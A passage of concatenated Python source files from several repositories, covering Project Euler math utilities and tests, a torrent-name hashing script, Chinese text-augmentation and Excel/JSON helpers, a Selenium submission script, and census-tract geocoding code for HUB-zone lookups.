        """Return [2, 3, 5, ...] — all primes below limit.

        thread_count sets the pool size (processes, despite the name).
        """
        p = Pool(thread_count)
        results = p.map(self._one_thread_, self._candidate_generator_())
        answers = [2]
        answers.extend(map(lambda y: y[0], self._filter_primes_(results)))
        return answers
cgnik/euler
src/py/util/repeats.py
import re, decimal

# Digits of precision used when expanding 1/n as a Decimal.
max_precision = 4096


def unit_fraction_cycle(n):
    """Return the repeating digit cycle of 1/n's decimal expansion ('' if none)."""
    decimal.setcontext(decimal.Context(prec=max_precision, rounding=decimal.ROUND_HALF_DOWN))
    val = str(decimal.Decimal(1) / decimal.Decimal(n))
    if val and '.' in val:
        # Keep the fractional part, dropping the final digit which may have
        # been rounded by the context.
        s = val.split('.')[1][:-1]
        return repeats(s)
    return ''


def repeats(big_s):
    """Find the substring whose repetition tiles (the tail of) big_s, or ''.

    Candidates are ranked by (occurrence count, length, coverage); the
    inspected prefix grows geometrically from 16 chars to keep the candidate
    set small for long inputs.
    """
    def find_repeats(s):
        # Enumerate substrings up to half the input length as cycle candidates.
        l_str = len(s)
        l_max = int(l_str / 2)
        combos = []
        for start in range(0, l_max):
            combos.extend([s[start:end + start] for end in range(start, l_max + 1)])
        combos = set(combos)
        # Rank: most occurrences first, then longest, then widest coverage.
        matches = [(len(re.findall(c, s)), len(c), (len(s) - s.index(c)), c) for c in combos if tip_to_tail(s, c)]
        matches.sort(reverse=True)
        if len(matches) > 0 and matches[0][0] > 1:
            return matches[0][3]
        return ''

    # Fast path: the whole string is one repeated character.
    if len(big_s) > 1 and len(re.findall(big_s[0], big_s)) == len(big_s):
        return big_s[0]
    l_full = len(big_s)
    l_part = 16
    while l_part <= l_full:
        cycle = find_repeats(big_s[:l_part])
        if cycle != '' or l_part >= l_full:
            return cycle
        l_part *= 2
        l_part = min(l_part, l_full)
    return ''


def tip_to_tail(s, sub):
    """True if, after the first occurrence, s is tiled end-to-end by sub
    (allowing one trailing partial repetition)."""
    if len(sub) == 0 or len(s) == 0:
        return False
    others = [o for o in s.split(sub)[1:] if o != sub and len(o) > 0]
    # A final fragment that is a prefix of sub counts as a partial repeat.
    if len(others) > 0 and sub.startswith(others[-1]):
        others = others[:-1]
    return not len(others) > 0
cgnik/euler
src/py/util/test_repeats.py
from unittest import TestCase

from util.repeats import unit_fraction_cycle, repeats, tip_to_tail


class Test_repeats(TestCase):
    """Unit tests for util.repeats (decimal-cycle detection)."""

    def test_repeats(self):
        self.assertEqual('', repeats('f'))
        self.assertEqual('f', repeats('ff'))
        self.assertEqual('flibbidy', repeats('flibbidyflibbidy'))
        self.assertEqual('', repeats('jibbetflibbidyflib'))
        # A repeating tail after a non-repeating prefix is still detected.
        self.assertEqual('flibbidy', repeats('jibbetflibbidyflibbidyflib'))

    def test_unit_fraction_cycle(self):
        # Terminating expansions (1/2, 1/4, 1/5, 1/8, 1/10) have no cycle.
        self.assertEqual('', unit_fraction_cycle(2))
        self.assertEqual('3', unit_fraction_cycle(3))
        self.assertEqual('', unit_fraction_cycle(4))
        self.assertEqual('', unit_fraction_cycle(5))
        self.assertEqual('6', unit_fraction_cycle(6))
        self.assertEqual('142857', unit_fraction_cycle(7))
        self.assertEqual('', unit_fraction_cycle(8))
        self.assertEqual('1', unit_fraction_cycle(9))
        self.assertEqual('', unit_fraction_cycle(10))

    def test_tip_to_tail(self):
        self.assertTrue(tip_to_tail('abcabc', 'abc'))
        # A trailing partial repetition ('a') is allowed...
        self.assertTrue(tip_to_tail('abcabca', 'abc'))
        self.assertTrue(tip_to_tail('dddabcabc', 'abc'))
        self.assertTrue(tip_to_tail('peqabcabca', 'abc'))
        # ...but trailing junk that is not a prefix of the cycle is not.
        self.assertFalse(tip_to_tail('peqabcabcp', 'abc'))
cgnik/euler
src/py/problem12.py
from util.numeric import triangles
from util.cartesian import cartesian_factors
from util.factoring import factors


def triangulate(start=2 ** 30, limit=100):
    """Yield (triangle_number, proper_factors) for triangle numbers >= start.

    Stops (returns rather than yields) once a triangle number has more than
    `limit` raw factors — that final pair becomes the generator return value.
    """
    count = 0
    for x in triangles():
        count += 1
        if x >= start:
            facs = list(factors(x, log=False))
            facs.remove(x)  # keep proper factors only
            if len(facs) > limit:
                return x, facs
            else:
                yield x, facs


def verify(n, facs):
    """Raise ValueError if any claimed factor does not divide n evenly."""
    for f in facs:
        if n % f != 0:
            raise ValueError(f"{n} is NOT evenly divisible by {f}")


def problem12():
    """Project Euler 12: first triangle number with more than 500 divisors."""
    # Progress notes from earlier runs:
    # N: 725145761340: cartlen: 490
    # start_threshold = 925517539128  # is the best so far
    # start_threshold = 725145761340  # is the best so far
    start_threshold = 55
    print(f"Starting factorization of triangles with {start_threshold}")
    best_len = 0  # NOTE(review): never updated or read below
    for answer in triangulate(start_threshold):
        # Expand the raw factor list to the full divisor set via closure.
        cart = cartesian_factors(answer[0], answer[1])
        print(f"N: {answer[0]} ({len(cart[1])})")
        if len(cart[1]) > 500:
            break
    verify(answer[0], cart[1])
    print(f"Answer: {answer[0]}\nFactor Count: {len(cart[1])}\n\tFactors: {cart}")


problem12()

# answer appears to be : 76576500
cgnik/euler
src/py/util/numeric.py
def ticklog(count, increment):
    """Print a progress dot (no newline) whenever count hits a multiple of increment."""
    if not count % increment:
        print(".", end='', flush=True)


def naturals(seed=1):
    """Yield the natural numbers seed, seed + 1, seed + 2, ... without bound."""
    value = seed
    while True:
        yield value
        value += 1


def triangles():
    """Yield the triangle numbers 1, 3, 6, 10, ... as a running sum of naturals."""
    total = 0
    for n in naturals():
        total += n
        yield total
cgnik/euler
src/py/problem15.py
from scipy.linalg import pascal


def problem15():
    """Project Euler 15: monotonic lattice paths through a 20x20 grid.

    The count is C(40, 20), which is the bottom-right entry of the 21x21
    symmetric Pascal matrix.

    Returns:
        int: the route count (also printed) so tests can verify it.
    """
    routes = int(pascal(21)[-1][-1])
    print(f"binom: {routes}")
    return routes


problem15()
sTeeLM/tc
tc.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import torrent_parser as tp import sys import md5 import re def md5_string(val): m = md5.new() matchObj = re.match(r'^(.*)\.(.*?)$', val) if matchObj: val = matchObj.group(1) m.update(val) return m.hexdigest() + '.' + matchObj.group(2) else: m.update(val) return m.hexdigest() data = tp.parse_torrent_file(sys.argv[1]) data['info']['name'] = md5_string(data['info']['name'].encode('utf-8')) data['info']['publisher'] = md5_string(data['info']['publisher'].encode('utf-8')) if 'name.utf-8' in data['info']: data['info']['name.utf-8'] = md5_string(data['info']['name.utf-8'].encode('utf-8')) if 'publisher.utf-8' in data['info']: data['info']['publisher.utf-8'] = md5_string(data['info']['publisher.utf-8'].encode('utf-8')) for i in range(0, len(data['info']['files'])): data['info']['files'][i]['path'][0] = md5_string(data['info']['files'][i]['path'][0].encode('utf-8')) if 'path.utf-8' in data['info']['files'][i]: data['info']['files'][i]['path.utf-8'][0] = md5_string(data['info']['files'][i]['path.utf-8'][0].encode('utf-8')) tp.create_torrent_file(sys.argv[2], data)
zingp/nlpclub
data/utils.py
import time
import json
import datetime

import xlrd
import xlsxwriter

"""
General-purpose data-handling helpers (text files, Excel, JSON lines).
"""


def read_text(file_path):
    """Read a text file and return its content as a list of lines.

    Args:
        file_path (str): path of the source text file
    Returns:
        data (list): one element per line (newlines stripped)
    """
    with open(file_path, "r") as f:
        data = f.read().splitlines()
    return data


def write_text(str_list, out_file):
    """Write a list of strings to a file, one per line.

    Args:
        str_list (list(str)): lines to write
        out_file (str): output file path
    """
    with open(out_file, "w") as f:
        for line in str_list:
            f.write(line + "\n")


def read_excel(file_path, sheet="Sheet1"):
    """Read an Excel sheet, returning data rows and the header row.

    Args:
        file_path (str): file to read, usually ending in .xlsx
        sheet (str): sheet name, default "Sheet1"
    Returns:
        data_li (list(tuple)): one entry per data row (header excluded)
        sheet.row_values(0) (list): the column names
    """
    data_li = []
    workbook = xlrd.open_workbook(file_path)
    sheet = workbook.sheet_by_name(sheet)
    for i in range(1, sheet.nrows):
        row = sheet.row_values(i)
        data_li.append(row)
    return data_li, sheet.row_values(0)


def write_excel(data_list, file_path, column_names):
    """Write rows to a new Excel workbook under the given header row."""
    workbook = xlsxwriter.Workbook(file_path)
    sheet1 = workbook.add_worksheet()
    # e.g. column_names = ["center word", "program id", "program name", "program summary"]
    for i in range(len(column_names)):
        sheet1.write(0, i, column_names[i])
    # Write the data rows below the header (row 0).
    for i, row_li in enumerate(data_list):
        sheet1_row = i + 1
        for j in range(len(row_li)):
            sheet1.write(sheet1_row, j, row_li[j])
    workbook.close()


def time2stamp(time_str):
    """Convert a 'YYYY-MM-DD HH:MM:SS' string to an integer Unix timestamp
    (interpreted in the local timezone via time.mktime)."""
    d = datetime.datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S")
    t = d.timetuple()
    return int(time.mktime(t))


def reverse_json(str_list):
    """Deserialize a list of JSON strings, collecting failures separately.

    Args:
        str_list: list(str) of JSON documents
    Returns:
        data: list(obj) of successfully parsed objects
        error: list(tuple) of (line, error message) for each failure
    """
    data = []
    error = []
    for line in str_list:
        try:
            dic = json.loads(line)
            data.append(dic)
        except Exception as e:
            error.append([line, str(e)])
    return data, error


def obj_to_json(data):
    """Serialize each object to a JSON string, keeping non-ASCII characters."""
    dataset = []
    for dic in data:
        line = json.dumps(dic, ensure_ascii=False)
        dataset.append(line)
    return dataset
zingp/nlpclub
data/eda.py
import jieba
import synonyms
import random
from random import shuffle
from pprint import pprint

"""
EDA (Easy Data Augmentation) for Chinese text.
Known issue: random swap may exchange punctuation tokens with each other.
"""

random.seed(42)


# Synonym replacement
def synonym_replacement(words, n, stopwords):
    """Replace up to n non-stopword tokens in `words` with a random synonym."""
    new_words = words.copy()
    random_word_list = list(set([w for w in words if w not in stopwords]))
    random.shuffle(random_word_list)
    num_replaced = 0
    for word in random_word_list:
        synonym_words = get_synonyms(word)
        if len(synonym_words) >= 1:
            synonym = random.choice(synonym_words)
            # Replace every occurrence of the chosen word.
            new_words = [synonym if w == word else w for w in new_words]
            num_replaced += 1
        if num_replaced >= n:
            break
    sentence = ' '.join(new_words)
    new_words = sentence.split(' ')
    return new_words


def get_synonyms(word):
    # synonyms.nearby returns (candidate_words, scores); keep the words only.
    return synonyms.nearby(word)[0]


# Random insertion
def random_insertion(words, n):
    """Insert n random synonyms (of random tokens) at random positions."""
    new_words = words.copy()
    for _ in range(n):
        add_word(new_words)
    return new_words


def add_word(new_words):
    """Pick a random token that has at least one synonym (up to 10 draws)
    and insert one of its synonyms at a random index, in place."""
    synonyms = []  # NOTE: shadows the imported module inside this function
    counter = 0
    while len(synonyms) < 1:
        random_word = new_words[random.randint(0, len(new_words) - 1)]
        synonyms = get_synonyms(random_word)
        counter += 1
        if counter >= 10:
            return
    random_synonym = random.choice(synonyms)
    random_idx = random.randint(0, len(new_words) - 1)
    new_words.insert(random_idx, random_synonym)


# Random swap: randomly swap two words in the sentence n times
def random_swap(words, n):
    new_words = words.copy()
    for _ in range(n):
        new_words = swap_word(new_words)
    return new_words


def swap_word(new_words):
    """Swap two distinct random positions (give up after 3 failed draws)."""
    idx1 = random.randint(0, len(new_words) - 1)
    idx2 = idx1
    counter = 0
    while idx2 == idx1:
        idx2 = random.randint(0, len(new_words) - 1)
        counter += 1
        if counter > 3:
            return new_words
    new_words[idx1], new_words[idx2] = new_words[idx2], new_words[idx1]
    return new_words


# Random deletion: drop each token independently with probability p
def random_deletion(words, p):
    if len(words) == 1:
        # Single-token sentences are returned unchanged.
        return words
    new_words = []
    for word in words:
        r = random.uniform(0, 1)
        if r > p:
            new_words.append(word)
    if len(new_words) == 0:
        # Never delete everything: keep one random token.
        rand_int = random.randint(0, len(words) - 1)
        return [words[rand_int]]
    return new_words


# EDA entry point
def eda(sentence, stopwords, alpha_sr=0.1, alpha_ri=0.1, alpha_rs=0.1, p_rd=0.1, num_aug=9, cha=""):
    """Generate augmented variants of `sentence` via the four EDA operations.

    The alpha_* rates scale how many tokens each operation touches; num_aug
    bounds the number of variants returned (the original sentence is always
    appended last); `cha` is the string used to rejoin tokens.
    """
    seg_list = jieba.cut(sentence)
    seg_list = " ".join(seg_list)
    words = list(seg_list.split())
    num_words = len(words)
    augmented_sentences = []
    num_new_per_technique = int(num_aug / 4) + 1
    n_sr = max(1, int(alpha_sr * num_words))
    n_ri = max(1, int(alpha_ri * num_words))
    n_rs = max(1, int(alpha_rs * num_words))
    # Synonym replacement (sr)
    for _ in range(num_new_per_technique):
        a_words = synonym_replacement(words, n_sr, stopwords)
        augmented_sentences.append(cha.join(a_words))
    # Random insertion (ri)
    for _ in range(num_new_per_technique):
        a_words = random_insertion(words, n_ri)
        augmented_sentences.append(cha.join(a_words))
    # Random swap (rs)
    for _ in range(num_new_per_technique):
        a_words = random_swap(words, n_rs)
        augmented_sentences.append(cha.join(a_words))
    # Random deletion (rd)
    for _ in range(num_new_per_technique):
        a_words = random_deletion(words, p_rd)
        augmented_sentences.append(cha.join(a_words))
    # print(augmented_sentences)
    shuffle(augmented_sentences)
    if num_aug >= 1:
        augmented_sentences = augmented_sentences[:num_aug]
    else:
        # Fractional num_aug: keep each variant with probability num_aug/len.
        keep_prob = num_aug / len(augmented_sentences)
        augmented_sentences = [s for s in augmented_sentences if random.uniform(0, 1) < keep_prob]
    # augmented_sentences.append(seg_list)
    augmented_sentences.append(sentence)
    return augmented_sentences


def eda_augment(textlist, stopwords, n):
    """Apply EDA to every sentence in textlist.

    Args:
        textlist: list of sentences
        n: number of augmented variants per sentence
    Returns:
        list of augmented sentences (flattened across inputs)
    """
    augment_list = []
    for snetence in textlist:
        eda_list = eda(snetence, stopwords, num_aug=n)
        augment_list.extend(eda_list)
    return augment_list


if __name__ == "__main__":
    # NOTE(review): the sibling utils.py defines read_text, not load_data —
    # confirm which helper this demo is meant to import.
    from utils import load_data
    stopwords = load_data("../../data/stopwords.txt")
    sentence = ["ๆ˜Ž็กฎๅ…šๅœจๆ–ฐๆ—ถไปฃ็š„ๅผบๅ†›็›ฎๆ ‡ๆ˜ฏๅปบ่ฎพไธ€ๆ”ฏๅฌๅ…šๆŒ‡ๆŒฅใ€่ƒฝๆ‰“่ƒœไป—ใ€ไฝœ้ฃŽไผ˜่‰ฏ็š„ๅ†›้˜Ÿใ€‚"]
    ans = eda_augment(sentence, stopwords, 20)
    pprint(ans)
zingp/nlpclub
data/main.py
from utils import read_excel, write_text
from utils import obj_to_json

# Splits an Excel dump of flagged broadcast segments into two JSON files:
# one for text violations (文本违规) and one for audio violations.


def build_audio_dic(text_list):
    """Map one 5-column spreadsheet row to a record dict.

    Returns {} when the row does not have exactly 5 columns, signalling
    a malformed row to the caller.
    """
    if len(text_list) != 5:
        return {}
    return {
        "idx": text_list[0],
        "date": text_list[1],
        "cate1": text_list[2],
        "cate2": text_list[3],
        "reason": text_list[4],
    }


def pretreat_excel():
    """Load the annotated Excel sheet and write the two JSON outputs."""
    excel = "~/Desktop/录播标注数据/2020年unsafe节目复核改-319.xlsx"
    data, cols = read_excel(excel)
    print(cols)
    print(data[:2])
    text_risk_list = []
    voice_risk_list = []
    for li in data:
        dic = build_audio_dic(li)
        if not dic:
            # BUG FIX: the original appended the empty dict from
            # malformed rows, and read li[3] before the length check,
            # which could raise IndexError on short rows.
            continue
        if li[3].strip() == "文本违规":
            text_risk_list.append(dic)
        else:
            voice_risk_list.append(dic)
    text_risk_data = obj_to_json(text_risk_list)
    voice_risk_data = obj_to_json(voice_risk_list)
    write_text(text_risk_data, "text_risk_data.json")
    write_text(voice_risk_data, "voice_risk_data.json")
    print("Done!")


if __name__ == "__main__":
    pretreat_excel()
zingp/nlpclub
data/about_excel.py
from utils import *

if __name__ == '__main__':
    # Convert a tab-separated dump of unsafe live-stream text into a
    # labelled Excel sheet.
    source = "/Users/liuyouyuan/Desktop/unsafe_text_main.txt"
    rows = [line.split("\t") for line in read_text(source)]
    header = ["Live id", "Text", "违规类型"]
    write_excel(rows, "/Users/liuyouyuan/Desktop/直播30s不安全标注20210419.xlsx", header)
zingp/nlpclub
emoji_data/proprecessing_emoji.py
import os
import re
import emoji
import numpy as np


def clean_text_zh(text):
    """Clean Chinese text: strip ASCII spaces, ideographic spaces and
    non-breaking spaces."""
    # Remove plain spaces.
    text = re.sub(' ', '', text)
    # \u3000 is the full-width (ideographic) space.
    text = re.sub('\u3000', '', text)
    # \xa0 is the non-breaking space (&nbsp;).
    text = re.sub('\xa0', '', text)
    return text


def filter_emoji(text, restr=''):
    """Strip all emoji from *text*, replacing each with *restr*."""
    # NOTE(review): get_emoji_regexp() was removed in emoji>=2.0 --
    # confirm the pinned emoji version before upgrading.
    prog = emoji.get_emoji_regexp()
    return prog.sub(restr, text)


def load_emoji(emoji_file):
    """Load a 'emoji ... chinese-description' mapping file into a dict.

    Each non-blank line's first token is the emoji, its last token the
    Chinese description; blank lines are skipped.
    """
    dic = {}
    with open(emoji_file, "r") as f:
        for line in f:
            if len(line.strip("\n").strip()) == 0:
                continue
            line = line.strip("\n")
            line_li = line.split()
            key = line_li[0]
            value = line_li[-1]
            dic[key] = value
    return dic


def emoji2zh(text, emoji_dic):
    """Replace every emoji in *text* with its Chinese description.

    Unknown emoji fall back to the literal "表情".
    """
    prog = emoji.get_emoji_regexp()
    for emo in re.findall(prog, text):
        # BUG FIX: the original called text.replace(text, ...), which
        # replaced the ENTIRE string with the first emoji's description
        # instead of substituting the emoji itself.
        text = text.replace(emo, emoji_dic.get(emo, "表情"))
    return text
ShuteLee/submit_to_site
main.py
# encoding=utf8
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import time
import os

'''
Update your chrome
Download the latest chromedriver
Put all the papers in one directory and update to "paper_dir"
If your chrome says "THE SITE CAN'T BE REACHED", please feel free to close it and try again, again...
'''


def openChrome():
    """Launch Chrome with the info bar disabled and return the driver."""
    opts = webdriver.ChromeOptions()
    opts.add_argument('disable-infobars')
    # set your chromedriver path
    return webdriver.Chrome(executable_path='XXX\\chromedriver.exe', chrome_options=opts)


def login(driver):
    """Type the conference ID into the login form and submit it."""
    id_field = driver.find_element_by_name("XXX")  # Conference ID
    id_field.send_keys("XXX")
    driver.find_element_by_name("XXX").click()


def submit_one(driver, paper_id):
    """Click the submit button for one paper and report success."""
    driver.find_element_by_xpath("//input [@type=\"submit\"]").click()
    print('{} submitted successfully'.format(paper_id))


# url = "XXX"
url = 'XXX'
paper_dir = 'XXX'

if __name__ == '__main__':
    paper_names = os.listdir(paper_dir)
    driver = openChrome()
    driver.get(url)
    login(driver)
    for name in paper_names:
        # File names are '<paper id>.<3-char extension>'.
        print('id:{}'.format(name[:-4]))
        submit_one(driver, name[:-4])
B-Rad80/code-components
hubQuery/FileDumpParser.py
# FileDumpParser: unpack uploaded zip archives and pull (id, address)
# pairs out of exported candidate CSVs.
import csv
import os, zipfile, sys
import codecs

# Working directory captured at import time; sub-folders are resolved
# relative to it.
og = os.getcwd()


def unzip(file):
    """Extract *file* inside ./ZipFIles and delete the archive.

    Prints a diagnostic and does nothing if *file* is not a zip.
    """
    cwd = os.path.join(og, "ZipFIles")
    print(cwd)
    os.chdir(cwd)  # change directory from working dir to dir with files
    if zipfile.is_zipfile(file):
        with zipfile.ZipFile(file, "r") as zip_ref:
            zip_ref.extractall(cwd)
        os.remove(file)  # delete zipped file
    else:
        print(file, "is not an existing Zipfile!")


def parseCSV(file):
    """Parse a candidate CSV inside ./CSVFiles.

    Rows whose 4th column is not "Rejected" are collected as
    [id, address] (5th column non-empty) or [id] (no address).
    Returns 1 when a blank row terminates the sheet; otherwise None.
    """
    cwd = os.path.join(og, "CSVFiles")
    print(cwd)
    os.chdir(cwd)
    addy_List = []
    noAddyList = []
    # BUG FIX: the file was opened in binary mode ('rb'); in Python 3
    # csv.reader and str.replace require text, so the original raised
    # TypeError on the first row.  NUL bytes are still stripped.
    with open(file, 'r') as csv_file:
        csv_reader = csv.reader(x.replace('\0', '') for x in csv_file)
        line_count = 0
        for row in csv_reader:
            if row == []:
                # Blank row marks end of data.
                print(addy_List)
                print("\n\nNO ADDR LIST \n\n\n\n")
                print(noAddyList)
                return 1
            if line_count == 0:
                # BUG FIX: f-prefix was missing, so the literal brace
                # expression was printed instead of the column names.
                print(f'Column names are {", ".join(row)}')
            elif row[3] != "Rejected":
                if row[4] != "":
                    addy_List.append([row[0], row[4]])
                else:
                    noAddyList.append([row[0]])
            line_count += 1


if __name__ == "__main__":
    # BUG FIX: these smoke-test calls previously ran at import time and
    # crashed any importer when the fixture files were absent.
    parseCSV("candidates.csv")
    unzip("Test1.zip")
B-Rad80/code-components
getInHub.py
import requests
import simplejson as json
import designation

# Google Maps API key.
key = "<KEY>"


def getCoord(addr):
    """Geocode a plaintext address with the Google Maps API.

    Returns a dict with 'error', 'errorFatal' and 'errorText' plus, when
    geocoding succeeded, 'lat', 'lng', the formatted address 'faddr' and
    the 'country' code.  Non-US addresses are reported as a non-fatal
    error (coordinates are still filled in).
    """
    payload = {'address': addr, 'key': key}
    mapsResponse = requests.get('https://maps.googleapis.com/maps/api/geocode/json', params=payload)
    mapsJson = json.loads(mapsResponse.text)
    if int(mapsResponse.status_code) >= 400:
        # BUG FIX: the original referenced the undefined name
        # censusResponse here (NameError) and concatenated the int
        # status code to a str (TypeError).
        return {'error': True, 'errorFatal': True,
                'errorText': 'HTTP Error: ' + str(mapsResponse.status_code)}
    if mapsJson['status'] != 'OK':
        return {'error': True, 'errorFatal': True, 'errorText': mapsJson['status']}
    country = ""
    for item in mapsJson['results'][0]['address_components']:
        if 'country' in item['types']:
            country = item['short_name']
    if country == "US":
        locInfo = {
            'error': False,
            'errorText': "",
            'lat': mapsJson['results'][0]['geometry']['location']['lat'],
            'lng': mapsJson['results'][0]['geometry']['location']['lng'],
            'faddr': mapsJson['results'][0]['formatted_address'],
            'country': country}
    else:
        locInfo = {
            'error': True,
            'errorFatal': False,
            'errorText': "Not a US Address",
            'lat': mapsJson['results'][0]['geometry']['location']['lat'],
            'lng': mapsJson['results'][0]['geometry']['location']['lng'],
            'faddr': mapsJson['results'][0]['formatted_address'],
            'country': country}
    return locInfo


def getCT(lat, lng):
    """Resolve coordinates to 2010 census tract and county codes via the
    Census Bureau geocoder.

    Returns {'error', 'errorText', 'tract', 'county'}; 'tract' is the
    11-digit code 'XXYYYZZZZZZ' (state XX, county YYY, tract ZZZZZZ) and
    'county' the 5-digit 'XXYYY' prefix.
    """
    payload = {'x': lng, 'y': lat,
               'benchmark': "Public_AR_Census2010",
               'vintage': 'Census2010_Census2010',
               'layers': '14', 'format': 'json'}
    censusResponse = requests.get('https://geocoding.geo.census.gov/geocoder/geographies/coordinates', params=payload)
    if int(censusResponse.status_code) >= 400:
        # BUG FIX: str() added -- status_code is an int and the original
        # str + int concatenation raised TypeError.
        return {'error': True,
                'errorText': 'HTTP Error: ' + str(censusResponse.status_code)}
    censusJson = json.loads(censusResponse.text)
    state = str(censusJson['result']['geographies']['Census Blocks'][0]['STATE'])
    county = str(censusJson['result']['geographies']['Census Blocks'][0]['COUNTY'])
    tract = str(censusJson['result']['geographies']['Census Blocks'][0]['TRACT'])
    tractFull = state + county + tract
    countyFull = state + county
    return {'error': False, 'errorText': "", 'tract': tractFull, 'county': countyFull}


class location():
    """A geocoded address plus its HUB-zone designation status."""

    locSet = False        # whether the location has been resolved
    addressString = ""    # raw input address (may stay blank)
    faddress = ""         # formatted address from the Maps API
    lat = "0"             # string representations of the coordinates
    lng = "0"
    tractCode = "0"       # 11-digit census tract code
    countyCode = "0"      # 5-digit county code
    designated = False
    applicantName = ""    # name of the person associated with the address
    designationInfo = {
        'county': {
            'name': "",
            'prevYearDes': False,
            'currYearDes': False,
            'prevYearReason': "",
            'currYearReason': ""},
        'tract': {
            'prevYearDes': False,
            'currYearDes': False}
    }
    error = False
    errorText = ""

    def __init__(self, addr):
        """Geocode *addr* and look up its designation.

        An empty string constructs the object without resolving a
        location.  Raises ValueError for non-string input.
        """
        if type(addr) != str:
            raise ValueError('addr must be type str')
        if addr != "":
            locInfo = getCoord(addr)
            if locInfo['error']:
                self.error = True
                self.errorText = "Maps API ERROR: ' " + locInfo['errorText'] + " '"
                if not locInfo['errorFatal']:
                    # Non-fatal (e.g. non-US): keep the formatted address.
                    self.faddress = locInfo['faddr']
            else:
                self.lat = str(locInfo['lat'])
                self.lng = str(locInfo['lng'])
                self.faddress = locInfo['faddr']
                self.locSet = True
            if not self.error:
                codes = getCT(self.lat, self.lng)
                if codes['error']:
                    self.error = True
                    self.errorText = "Census API Error: ' " + codes['errorText'] + " '"
                else:
                    self.tractCode = codes['tract']
                    self.countyCode = codes['county']
            if not self.error:
                # Pull designation from the database; overall flag is
                # true if either county or tract is designated this year.
                self.designationInfo = designation.getDesignation(self.countyCode, self.tractCode)
                self.designated = (self.designationInfo['county']['currYearDes']
                                   or self.designationInfo['tract']['currYearDes'])

    def setName(self, name):
        """Attach the applicant's name; raises ValueError for non-str."""
        if type(name) != str:
            raise ValueError('name must be type str')
        self.applicantName = name
B-Rad80/code-components
FileDumpParser.py
# FileDumpParser: pulls applicant addresses out of uploaded CSV, docx
# and zip dumps for the hubQuery views.
import csv
import os
import zipfile
import sys
import io
import glob
import pyap
import docx
import codecs


class FileDumpParser:

    def __init__(self, d=False):
        """Capture the working directory and a debug flag.

        BUG FIX: the class previously defined __init__ twice; Python
        keeps only the last definition, so the zero-argument form was
        dead code.  Merged into one with *d* defaulting to False, which
        is backward-compatible with both call sites.
        """
        self.og = os.getcwd()
        self.debug = d

    def unzip(self, file):
        """Extract an uploaded zip into the working directory and return
        the archive's base name (extension stripped)."""
        if self.debug:
            cwd = os.path.join(self.og, "ZipFIles")
            print(cwd)
        if os.path.isdir(file.name[:-4]):
            print("directory already exists")
            # NOTE(review): sentinel value kept for callers -- rename
            # only after auditing uses of the return value.
            return "fuck"
        cwd = self.og
        os.chdir(cwd)  # change directory from working dir to dir with files
        if zipfile.is_zipfile(file):
            print("is zip")
            with zipfile.ZipFile(file, "r") as zip_ref:
                zip_ref.extractall(cwd)
        else:
            print(file, "is not an existing Zipfile!")
        return file.name[:-4]

    def parseCSV(self, file):
        """Parse an uploaded UTF-16 CSV into [with-address, without-address]
        lists; a blank row terminates the sheet early."""
        if self.debug:
            cwd = os.path.join(self.og, "mysite/CSVFiles")
            print(cwd)
        addy_List = []
        noAddyList = []
        decoded_file = file.read().decode('utf-16')
        io_string = io.StringIO(decoded_file)
        line_count = 0
        for row in csv.reader(io_string, delimiter=',', quotechar='|'):
            if row == []:
                print(addy_List)
                print("\n\nNO ADDR LIST \n\n\n\n")
                print(noAddyList)
                return [addy_List, noAddyList]
            print(line_count)
            if line_count == 0:
                print('Column names are {", ".join(row)}')
            elif row[3] != "Rejected":
                if row[4] != "":
                    addy_List.append([row[0], row[4]])
                else:
                    noAddyList.append([row[0]])
            line_count += 1
        print(addy_List)
        print("\n\nNO ADDR LIST \n\n\n\n")
        print(noAddyList)
        return [addy_List, noAddyList]

    def Address_Search(self, test_address):
        """Debug helper: print all US addresses found in a string.  NOT in use."""
        addresses = pyap.parse(test_address, country='US')
        for address in addresses:
            print(address)          # found address
            print(address.as_dict())  # address parts

    def Docx_to_Text(self, filename):
        """Extract the text of a .docx and pull the first US address.

        Returns [addylist, noaddylist] where addylist holds
        [filename, address] pairs.  Not in use.
        """
        noaddylist = []
        addylist = []
        if self.debug:
            print(self.og)
            print(os.path.isfile(filename))
        doc = docx.Document(filename)
        store = ""
        for para in doc.paragraphs:
            store = store + "\n" + para.text
        addy = [str(address) for address in pyap.parse(store, country='US')]
        if not addy:
            # BUG FIX: the original indexed addy[0] on an empty list
            # (IndexError) and appended the undefined name `file`.
            print(filename, "no address found")
            noaddylist.append(filename)
        else:
            print(addy[0], "found address with name", filename)
            addylist.append([filename, addy[0]])
        ret = [addylist, noaddylist]
        print(ret, "= ret")
        return ret

    def read_through_folder(self, filename):
        """Return the names of all .txt files inside *filename*."""
        ret = []
        if self.debug:
            cwd = os.path.join(self.og, "CSVFiles")
            print(filename, " is path?: ", os.path.isdir(filename))
        cwd = os.path.join(self.og, filename)
        os.chdir(cwd)
        print(cwd)
        for file in glob.glob('*.txt'):
            ret.append(file)
        return ret

    def Text_to_String(self, filename):
        """Scan every .txt inside directory *filename* for a US address,
        deleting each file (and finally the directory) as it goes.

        Returns [addylist, noaddylist].
        """
        noaddylist = []
        addylist = []
        if self.debug:
            cwd = os.path.join(self.og, "CSVFiles")
            print(os.path.isdir(filename))
            print(filename)
        cwd = os.path.join(self.og, filename)
        os.chdir(cwd)
        print(cwd)
        for file in glob.glob('*.txt'):
            temp = open(file, 'r').read().strip()
            addy = [str(address) for address in pyap.parse(temp, country='US')]
            if not addy:
                # BUG FIX: the original printed addy[0] on an empty
                # list, raising IndexError before recording the file.
                print(file, "no address found")
                noaddylist.append(file)
            else:
                print(addy[0], "found address with name", file)
                addylist.append([file, addy[0]])
            os.remove(file)
        ret = [addylist, noaddylist]
        print(ret, "= ret")
        cwd = os.chdir("../")
        print(cwd)
        os.rmdir(filename)
        return ret


if __name__ == "__main__":
    # BUG FIX: these smoke tests previously ran at import time, crashing
    # any importer (e.g. hubQuery/views.py) when the fixtures were absent.
    bigdumper = FileDumpParser(True)
    print("Testing...\n")
    print(bigdumper.Docx_to_Text("test1.docx"))
    # print(bigdumper.unzip("Test1.zip"))
B-Rad80/code-components
mysite/accounts/views.py
from django.shortcuts import render # Create your views here. def signup(request): return render(request, 'app/signup.html') def signin(request): return render(request, 'app/signup.html')
B-Rad80/code-components
designation.py
import psycopg2
import os


def getDesignation(countyCode, tractCode):
    """Look up HUB-zone designation status for a county and census tract.

    Queries the local `hub_designations` Postgres database and returns a
    dict shaped like location.designationInfo in getInHub.py:
